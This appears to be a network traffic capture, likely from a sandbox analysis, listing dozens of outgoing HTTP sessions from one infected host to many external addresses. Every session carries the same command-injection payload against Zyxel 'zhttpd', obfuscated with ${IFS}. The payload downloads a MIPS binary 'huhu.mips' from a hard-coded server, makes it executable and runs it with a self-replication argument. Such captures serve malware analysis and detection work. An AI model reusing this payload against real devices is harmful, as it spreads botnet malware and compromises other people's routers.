                                            Feb 2, 2024 06:21:05.494545937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2485192.168.2.154719866.151.95.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494601965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2486192.168.2.1559260178.242.117.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494646072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2487192.168.2.1544548191.80.110.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494674921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2488192.168.2.1541106198.185.27.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494714022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2489192.168.2.1560680158.28.207.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494746923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2490192.168.2.1548010125.8.169.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494780064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2491192.168.2.1532788190.10.205.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494817972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2492192.168.2.1555118126.4.88.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494857073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2493192.168.2.155861642.133.41.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494894981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2494192.168.2.155216071.106.61.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494908094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2495192.168.2.1547264195.156.80.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494947910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2496192.168.2.1549728181.202.128.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494987011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2497192.168.2.1550592180.244.186.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495008945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2498192.168.2.155580418.119.214.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495048046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2499192.168.2.1560396197.121.107.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495095015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2500192.168.2.1550842221.150.117.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495129108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2501192.168.2.155150019.214.242.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495146990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2502192.168.2.154921023.208.129.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495193958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2503192.168.2.153956037.167.181.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495194912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2504192.168.2.156035293.44.48.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495237112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2505192.168.2.1539174137.32.157.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495289087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2506192.168.2.154742286.198.211.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495340109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2507192.168.2.1542548145.208.20.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495351076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2508192.168.2.1535402148.95.51.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495378017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2509192.168.2.153947637.85.1.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495419979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2510192.168.2.1551282161.196.225.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495450974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2511192.168.2.1555944100.37.144.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495492935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2512192.168.2.1544266164.207.171.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495533943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2513192.168.2.15492901.79.134.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495588064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2514192.168.2.1546034150.83.229.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495616913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2515192.168.2.153556647.251.219.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495650053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2516192.168.2.153695639.1.238.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495681047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2517192.168.2.1539900138.133.187.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495737076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2518192.168.2.1556408222.70.86.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495778084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2519192.168.2.1556598179.142.138.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495800972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2520192.168.2.15345445.112.242.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495837927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2521192.168.2.153725650.109.152.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495868921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2522192.168.2.1544296121.191.201.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495913982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2523192.168.2.1559522202.4.211.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495958090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2524192.168.2.1534846198.201.170.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.495996952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2525192.168.2.154270845.101.4.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496025085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2526192.168.2.154268882.141.191.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496131897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2527192.168.2.154224243.13.254.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496184111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2528192.168.2.1554672111.169.83.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496223927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2529192.168.2.155349627.226.1.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496249914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2530192.168.2.1537462172.60.29.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496304035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2531192.168.2.1540716104.99.29.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496313095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2532192.168.2.15473269.255.56.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496376991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2533192.168.2.153512214.208.134.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496407032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2534192.168.2.1535042221.236.243.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496434927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2535192.168.2.1559044147.158.111.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496506929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2536192.168.2.153341664.119.192.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496525049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2537192.168.2.155681017.175.4.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496560097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2538192.168.2.155984676.10.199.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496584892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2539192.168.2.1552236131.47.212.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496654034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2540192.168.2.153332262.107.127.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496674061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2541192.168.2.1539858149.240.188.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496716022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2542192.168.2.1551990102.191.92.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496747017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2543192.168.2.1553018125.16.221.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496815920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2544192.168.2.153979694.20.150.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496835947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2545192.168.2.1545670209.223.82.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496855021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2546192.168.2.1558606116.129.192.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496906042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2547192.168.2.1533538167.213.83.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.496967077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2548192.168.2.1546834187.238.108.242443
                                            TimestampBytes transferredDirectionData
